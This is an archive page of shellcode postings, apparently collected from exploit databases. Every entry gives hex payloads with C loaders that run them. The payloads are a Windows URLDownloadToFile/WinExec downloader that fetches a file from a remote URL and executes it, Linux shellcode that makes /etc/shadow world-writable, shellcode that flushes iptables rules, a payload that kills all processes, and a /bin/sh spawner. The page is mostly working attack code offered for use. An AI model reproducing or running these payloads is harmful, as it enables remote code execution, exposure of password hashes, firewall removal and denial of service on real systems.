Archive for shellcode

Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode

Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode

/*
Title: Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode
Date: 2013-22-01
Author: RubberDuck
Web: http://bflow.security-portal.cz
http://www.security-portal.cz
Tested on: Win 2k, Win XP Home SP2/SP3 CZ (32), Win 7 (32/64)
-- file is downloaded from URL http://bflow.security-portal.cz/down/xy.txt
-- xy.txt - http://www.virustotal.com/file/7d0d68f8e378d5aa29620c749f797d1d5fa05356fbf6f9ca64ba00f00fe86182/analysis/1358866648/
-- xy.txt only shows MessageBox with text "Test application for Allwin URLDownloadToFile shellcode"
and title ">> Author: RubberDuck - http://bflow.security-portal.cz <<"
 
*/
 
#include <windows.h>
#include <stdio.h>
 
int main(){
unsigned char shellcode[] =
"\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B"
"\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53"
"\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72"
"\x20\x03\xF3\x33\xC9\x41\xAD\x03\xC3\x81"
"\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04"
"\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64"
"\x64\x72\x65\x75\xE2\x8B\x72\x24\x03\xF3"
"\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3"
"\x8B\x14\x8E\x03\xD3\x33\xC9\x51\x68\x2E"
"\x65\x78\x65\x68\x64\x65\x61\x64\x53\x52"
"\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62"
"\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2"
"\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C"
"\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C"
"\x6D\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24"
"\x04\x33\xC9\x51\x66\xB9\x65\x41\x51\x33"
"\xC9\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64"
"\x54\x68\x6F\x77\x6E\x6C\x68\x55\x52\x4C"
"\x44\x54\x50\xFF\xD2\x33\xC9\x8D\x54\x24"
"\x24\x51\x51\x52\xEB\x47\x51\xFF\xD0\x83"
"\xC4\x1C\x33\xC9\x5A\x5B\x53\x52\x51\x68"
"\x78\x65\x63\x61\x88\x4C\x24\x03\x68\x57"
"\x69\x6E\x45\x54\x53\xFF\xD2\x6A\x05\x8D"
"\x4C\x24\x18\x51\xFF\xD0\x83\xC4\x0C\x5A"
"\x5B\x68\x65\x73\x73\x61\x83\x6C\x24\x03"
"\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69"
"\x74\x54\x53\xFF\xD2\xFF\xD0\xE8\xB4\xFF"
"\xFF\xFF"
// http://bflow.security-portal.cz/down/xy.txt
"\x68\x74\x74\x70\x3A\x2F\x2F\x62"
"\x66\x6C\x6F\x77\x2E\x73\x65\x63\x75\x72"
"\x69\x74\x79\x2D\x70\x6F\x72\x74\x61\x6C"
"\x2E\x63\x7A\x2F\x64\x6F\x77\x6E\x2F\x78"
"\x79\x2E\x74\x78\x74\x00";
 
LPVOID lpAlloc = NULL;
void (*pfunc)();
 
lpAlloc = VirtualAlloc(0, 4096,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
 
if(lpAlloc == NULL){
printf("Memory isn't allocated!\n");
return 0;
}
 
memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1);
 
pfunc = (void (*)())lpAlloc;
 
pfunc();
 
return 0;
}
 

linux/x86 execve-chmod 0777 /etc/shadow 58 bytes shellcode

linux/x86 execve-chmod 0777 /etc/shadow 58 bytes shellcode

***************************************************************
* Linux/x86 execve-chmod 0777 /etc/shadow  58 bytes 
***************************************************************
* Author: Hamza Megahed                             
***************************************************************
* Twitter: @Hamza_Mega                              
***************************************************************
* blog: hamza-mega[dot]blogspot[dot]com             
***************************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com        
***************************************************************
 
xor    %eax,%eax
push   %eax
pushl  $0x776f6461
pushl  $0x68732f2f
pushl  $0x6374652f
movl   %esp,%esi
push   %eax
pushl  $0x37373730
movl   %esp,%ebp
push   %eax
pushl  $0x646f6d68
pushl  $0x632f6e69
pushl  $0x622f2f2f
mov    %esp,%ebx
pushl  %eax
pushl  %esi
pushl  %ebp
pushl  %ebx
movl   %esp,%ecx
mov    %eax,%edx
mov    $0xb,%al
int    $0x80
 
********************************
#include <stdio.h>
#include <string.h>
 
char *shellcode = 
"\x31\xc0\x50\x68\x61\x64\x6f\x77\x68\x2f\x2f\x73"
"\x68\x68\x2f\x65\x74\x63\x89\xe6\x50\x68\x30\x37"
"\x37\x37\x89\xe5\x50\x68\x68\x6d\x6f\x64\x68\x69"
"\x6e\x2f\x63\x68\x2f\x2f\x2f\x62\x89\xe3\x50\x56"
"\x55\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
 
 
 
 
 
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}

linux/x86 iptables –flush 43 bytes shellcode

linux/x86 iptables –flush 43 bytes shellcode

************************************************************
*      Linux/x86 iptables --flush 43 bytes                 *
************************************************************
*          Author: Hamza Megahed                           *
************************************************************
*              Twitter: @Hamza_Mega                        *
************************************************************
*      blog: hamza-mega[dot]blogspot[dot]com               * 
*    E-mail: hamza[dot]megahed[at]gmail[dot]com            *
************************************************************
 
 
xor    %eax,%eax
push   %eax
pushw  $0x462d
movl   %esp,%esi
pushl  %eax
pushl  $0x73656c62
pushl  $0x61747069
pushl  $0x2f6e6962
pushl  $0x732f2f2f
mov    %esp,%ebx
pushl  %eax
pushl  %esi
pushl  %ebx
movl   %esp,%ecx
mov    %eax,%edx
mov    $0xb,%al
int    $0x80
 
********************************
#include <stdio.h>
#include <string.h>
 
char *shellcode = "\x31\xc0\x50\x66\x68\x2d\x46\x89\xe6\x50\x68\x62\x6c\x65\x73"
"\x68\x69\x70\x74\x61\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f"
"\x73\x89\xe3\x50\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
 
 
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}

BackBox Linux 3.0 – amd64 sys_kill -x86 linux shellcode

BackBox Linux 3.0 – amd64 sys_kill -x86 linux shellcode

#include <stdio.h>
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com    
[+] we are 1337day Algeria Community                 
0                                                                      0
1               #########################################              1
0               I'm TrOon member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
---
 
char *killer=
"\x31\xc0"                    /* xor    %eax,%eax */
"\xb0\x25"                    /* mov    $0x25,%al */
"\x6a\xff"                    /* push   $0xffffffff */
"\x5b"                        /* pop    %ebx */
"\xb1\x09"                    /* mov    $0x9,%cl */
"\xcd\x80"                    /* int    $0x80 */
 
 
 
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(killer));
((void (*)(void)) killer)();
return 0;
}

Linux/x86 – execve /bin/sh shellcode 23 bytes

Linux/x86 – execve /bin/sh shellcode 23 bytes

******************************************************
* Linux/x86 execve /bin/sh shellcode 23 bytes   *
******************************************************
* Author: Hamza Megahed                                *
******************************************************
* Twitter: @Hamza_Mega                                  *
******************************************************
* blog: hamza-mega[dot]blogspot[dot]com        *
******************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com *
******************************************************
 
xor    %eax,%eax
push   %eax
push   $0x68732f2f
push   $0x6e69622f
mov    %esp,%ebx
push   %eax
push   %ebx
mov    %esp,%ecx
mov    $0xb,%al
int    $0x80
 
**********************************************
 
#include <stdio.h>
#include <string.h>
 
char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
 
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}